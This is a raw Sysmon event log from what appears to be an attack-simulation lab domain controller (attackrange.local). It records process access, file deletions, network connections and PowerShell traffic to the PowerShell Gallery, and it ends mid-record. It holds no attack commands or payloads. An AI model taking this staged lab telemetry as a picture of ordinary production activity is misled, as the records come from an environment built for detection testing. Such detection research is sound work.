21:07:59.585{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024192Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:59.585{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024191Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:59.585{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024190Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:59.585{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A2AF-60D3-1D06-00000000CF01}6504C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024189Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:59.585{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A2AF-60D3-1D06-00000000CF01}6504C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000024188Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:59.586{4DB9351A-A2AF-60D3-1D06-00000000CF01}6504C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000024187Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:59.491{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=65D35A478E443AEAED23D45B6CB74C80,SHA256=6EDA1956531DF564388BFF403844C70999254BA555A1B121F38A1E1BCB7197DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024200Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:00.821{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A69C452E175B23281C3B0CBC59D8D9C3,SHA256=5201F7F23ABDA13AE66557A78EC1882ED71C62F699C54C565EFA4D8FEA3F3231,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024199Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:00.598{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4A5038936FA9AB86A0B5826C5571C809,SHA256=6615B4445D97BB78E200E2EAF031F00E7F01B2D973C61D35E7164EB4BD33F6FD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024198Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:00.458{4DB9351A-9DDB-60D3-0B00-00000000CF01}628676C:\Windows\system32\lsass.exe{4DB9351A-9DD8-60D3-0100-00000000CF01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x800000000000000024197Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:00.067{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2650735853112FDED9CD3CA44AC6AA00,SHA256=D8A34508A10FDF92B82F5160AC5FCA911083C92216E6797947D305376B7EA96F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024212Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:01.665{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7BDFB5849DC78E49E46F42245676D3D7,SHA256=CF6438C81403B6084E6BDB6FB6265A151C41A36F2C810E0EEFD4EC417378F5CA,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024211Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:00.512{4DB9351A-9DD8-60D3-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61486-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local445microsoft-ds 354300x800000000000000024210Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:00.512{4DB9351A-9DD8-60D3-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61486-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local445microsoft-ds 354300x800000000000000024209Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:00.493{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61485-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local49666- 354300x800000000000000024208Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:00.493{4DB9351A-9DDD-60D3-1400-00000000CF01}1056C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61485-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local49666- 354300x800000000000000024207Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:00.489{4DB9351A-9DDD-60D3-0D00-00000000CF01}904C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61484-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local135epmap 354300x800000000000000024206Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:00.489{4DB9351A-9DDD-60D3-1400-00000000CF01}1056C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61484-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local135epmap 354300x800000000000000024205Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:00.389{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local61483-true2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local389ldap 354300x800000000000000024204Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:00.389{4DB9351A-9DDE-60D3-1600-00000000CF01}1292C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetrue2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local61483-true2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local389ldap 354300x800000000000000024203Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:00.379{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61482-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local389ldap 354300x800000000000000024202Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:00.379{4DB9351A-9DDE-60D3-1600-00000000CF01}1292C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61482-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local389ldap 23542300x800000000000000024201Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:01.087{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=969E73F4C43F378556B43E0A99A3D93D,SHA256=D3CF26B910C7560736F3C0B015898546B5F8A356F98B385184AF1FD7AF6DF783,IMPHASH=00000000000000000000000000000000falsetrue 22542200x800000000000000024214Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:00.495{4DB9351A-9DDD-60D3-1400-00000000CF01}1056win-dc-663.attackrange.local0fe80::fdd4:2588:4c96:4409;fe80::18c1:3b8f:f5ff:fef1;2001:0:34f1:8072:18c1:3b8f:f5ff:fef1;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 23542300x800000000000000024213Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:02.102{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B28DBC41BFF8C627A6EA6B2600B8E4EA,SHA256=56445A3F47CF7D02689A54ED44F1E1C3DF14A62B597E143704E0092026B222FD,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024216Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:01.142{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61487-false10.0.1.12-8000- 23542300x800000000000000024215Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:03.102{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2A50C15D46F88F0108D45FD072B89D0,SHA256=D9FD329B7DCBF2AE675AEFF9370C9C430FDA50FB3526FBD2665BDAF65835164E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024217Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:04.118{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=411589CA96B8CE3C74C0AB456CCD40E2,SHA256=32822EF7DB92D801338B30E002B266259813465523F84B002CCDC08DF6427EF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024218Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:05.118{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6162C27507805406B89F9E9379AE0233,SHA256=2A73BF8CB86897605D9877FBBD2A0048AD006609316F4D6B03BC2521289A8735,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024219Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:06.134{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCF2FDA52F6BCEB5C55DE6C3E1291293,SHA256=F6ED73AB588DBE63A39A9913FEA7D0A2CCF92B3E8F6478BA7DD730EB2EC4BE8B,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024221Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:06.157{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61488-false10.0.1.12-8000- 23542300x800000000000000024220Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:07.149{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=145F80BF6FD2A009A5FA4C25D6E1C123,SHA256=001BF889007B07487CCF3EB6B7951E7705906EA5BB3B3FB6601AA0A9ADC92262,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024225Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:08.352{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3C471FD702386225BD680E6B7596280C,SHA256=B33D8456ED7EEC96BA317D8B9419F9088A9F28FEFA9D1E7343421A0FA49369DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024224Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:08.352{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=0DCB1AB34BE391E57B4D853C563FE72D,SHA256=6F8ECE9325A6C1DF0D57A5FB1877A1B870D2DD1C692C3F9AC1CD43DA0D2F6D4D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024223Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:08.352{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=A6DF2A84D07D2C39B77EECE187D80EC7,SHA256=4B40210B840E84FF2E7B5A97198956CFEC9D3CD7A476A0419B1D41A5B6DF18DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024222Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:08.165{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE37269EA4CD500429265F477537BB09,SHA256=06AD62A74E87411BF5829A41FFE7E6D750E549F58491F41399020578E5392757,IMPHASH=00000000000000000000000000000000falsetrue 22542200x800000000000000024234Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:07.872{4DB9351A-A273-60D3-3C05-00000000CF01}6608www.powershellgallery.com0type: 5 powershellgallerytrafficmanager.trafficmanager.net;type: 5 psg-prod-centralus.cloudapp.net;::ffff:168.61.186.235;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000024233Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:09.665{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=FAD155AD3F4320A363BAAE97C90EBE1E,SHA256=250B7C8A8B2B4A5BCC2C79F1C598D2CC5455DB1E3DCBAD6ABB82E17A92EB919D,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024232Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:08.530{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-663.attackrange.local61493-false104.77.62.187a104-77-62-187.deploy.static.akamaitechnologies.com443https 354300x800000000000000024231Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:08.331{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-663.attackrange.local61492-false168.61.186.235-443https 354300x800000000000000024230Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:08.188{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-663.attackrange.local61491-false104.77.62.187a104-77-62-187.deploy.static.akamaitechnologies.com443https 354300x800000000000000024229Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:07.921{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-663.attackrange.local61490-false168.61.186.235-443https 354300x800000000000000024228Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:07.778{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local59825- 354300x800000000000000024227Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:07.682{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-663.attackrange.local61489-false104.77.62.187a104-77-62-187.deploy.static.akamaitechnologies.com443https 23542300x800000000000000024226Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:09.180{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3749E644BE64C8B5089BB064C1DB786,SHA256=8DD7455AB4976F33555D549BA4684D19C0E99FF307B9DFF6FE9F5B10E87053B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024235Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:10.212{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DADA25A7AE741DB80BCFD8925BA632CF,SHA256=E7565BC1AAAD903CE3A15BA9A8B9C292A55096285BFDE73C882378A344059455,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024242Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:10.521{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-663.attackrange.local61496-false168.61.186.235-443https 354300x800000000000000024241Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:10.053{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-663.attackrange.local61495-false168.61.186.235-443https 354300x800000000000000024240Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:09.704{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local54904- 354300x800000000000000024239Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:08.671{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-663.attackrange.local61494-false168.61.186.235-443https 23542300x800000000000000024238Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:11.450{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=2E69655A5E4D009B99864F48910BADF8,SHA256=C03CF3348527282E32DBAA6740A0C233C6D0EA73CBD1C6DEAC7089A99BFE5035,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024237Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:11.434{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 